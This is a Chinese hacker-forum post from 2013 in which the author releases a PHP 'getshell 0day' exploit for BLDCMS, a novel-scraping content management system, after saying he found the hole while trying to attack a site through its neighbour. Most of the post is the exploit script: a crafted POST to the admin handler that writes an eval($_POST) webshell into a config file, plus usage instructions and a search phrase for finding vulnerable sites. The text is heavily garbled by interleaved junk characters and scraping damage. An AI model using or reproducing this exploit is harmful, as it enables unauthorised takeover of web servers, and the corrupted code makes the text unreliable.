之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞2 p8 p- v; H+ H& Y7 Q8 z" b5 i
" O$ u5 ?* M. C W5 z j0 A; X8 Z5 R1 @+ W1 ]: U4 y% ?
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
# A1 x. ~- b j7 |* e 9 J6 m' d' u4 I
既然都有人发了 我就把我之前写好的EXP放出来吧5 B: c) `. Q6 B/ C6 o4 F
; g' F8 R& _+ C: J! Y4 E3 [2 Fview source print?01.php;"> k" k( m! h9 ]- G4 v
02.<!--?php V0 {5 \0 T, O7 Y' |, F8 A2 ?. U
03.echo "-------------------------------------------------------------------/ G: e8 o" S @2 L' x: s/ E
04.
2 d+ h1 y" O: R# N# l+ R9 P: a05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP2 y6 ?: Q' w% i2 {" l- p9 M9 p
06. * j: c8 R8 s* J" {" x
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
8 K# L" n% M u1 s4 G08. ; [2 \3 M O' S2 p
09.QQ:981009941\r\n 2013.3.21\r\n / [) i8 t2 p) k7 e, r C1 v
10. 5 w; @$ |. r4 H! ]
11. 8 ]$ l, X& K, M3 H# y. y7 z
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码' r# Y+ Y& L5 F
13.
8 T- N k5 i7 P3 d14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
. w& |* B+ M# _; j4 b0 S4 v15. 9 Y( I$ X/ y' V& D& s
16.--------------------------------------------------------------------\r\n";' x5 N. b2 V% ?
17.$url=$argv[1];! M' @& \; Y5 A0 b
18.$dir=$argv[2];% I- l7 }6 g1 l) V" I
19.$pass=$argv[3];
0 |5 C: P: } l- K( ^3 S5 |8 |20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';" |+ L0 G! T) s0 s g# x# _
21.if (emptyempty($pass)||emptyempty($url))
8 W3 F: n$ \9 N' Q$ ]$ D' S22.{exit("请输入参数");}
& ] a& X* d! D: n23.else9 G& k; \/ M7 f; u/ ]* B$ V
24.{' V. k" |1 B. D
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
5 \( O: ~: y+ l26. 9 o) C0 ]5 c. \, b
27.al;* {( ^% k' o: M" y2 E; B7 ?$ W
28.$length = strlen($fuckdata);$ i3 T$ w+ Y1 s
29.function getshell($url,$pass)" U* I. b3 O6 c" y9 w
30.{
* o6 R3 q8 c: h# ]! k9 o31.global $url,$dir,$pass,$eval,$length,$fuckdata;% Q$ S, \5 _2 B' h! ~0 C
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";# D. `: h" |" X5 I" L; c
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
! c; i8 i5 A4 n$ p& ~34.$header .= "User-Agent: MSIE\r\n";
6 g3 h8 z. R7 P; H5 e35.$header .= "Host:".$url."\r\n";
4 J& L. l! M P B( ]% |36.$header .= "Content-Length: ".$length."\r\n";
' w# k& O. B9 t/ k( m% m37.$header .= "Connection: Close\r\n";
% i9 C% Q. w! q1 e2 o" P3 X38.$header .="\r\n";
7 V0 ~ z5 S- ?5 P9 \39.$header .= $fuckdata."\r\n\r\n";+ \+ u: ~; k- t5 i
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
) U( E8 I/ k" ?+ y' L" l0 _) b41.if (!$fp)/ p' s! |& c' T1 D+ E4 a
42.{
) Z/ r. u2 ~, v- I3 ^$ r- A43.exit ("利用失败:请检查指定目标是否能正常打开");) U- k1 J: l% s) N1 C
44.}. b M! U5 ]/ G5 o3 J( Z4 k5 @8 j
45.else{ if (!fputs($fp,$header))
% v% k/ R) O. e9 |7 T2 a46.{exit ("利用失败");}9 F; C2 O! D: ^ Y) F
47.else
0 K8 q' r- i9 P- n% ~( Y) g9 X48.{
! I' V3 [3 Y4 r- e49.$receive = '';
/ z# k% z) S( g" T5 c$ L50.while (!feof($fp)) {
" U$ C: m! z$ F! |2 @" p+ N51.$receive .= @fgets($fp, 1000);. _7 t* ?1 |* q& R2 Z6 J
52.}
/ x& f/ T9 C) L5 g+ h& h53.@fclose($fp);3 u, m# r' D4 R
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
9 p# |* M" q' O55.
% a! x/ B1 r9 x+ Y56.GPC是否=off)";
}: ~. g! O4 V57.}}. t& r( d: w- ?8 p$ x
58.}
3 g/ j; Y3 P7 B0 [( g59.} D, M* s, J$ d
60.getshell($url,$pass);
6 H$ l. e# D' H! [0 d4 G, ~3 [* E61.?-->, i$ v1 k7 [* R7 [- b6 u+ U
* F+ s5 {" `$ I: o, _0 T0 g
p# L8 L6 H$ ^% F1 a5 A / `' P" X- n, X# b" U
by 数据流! b' ?/ |4 G* H6 q5 J5 K' S' z9 c
|
发表于 2013-3-26 20:49:10
收藏
支持
反对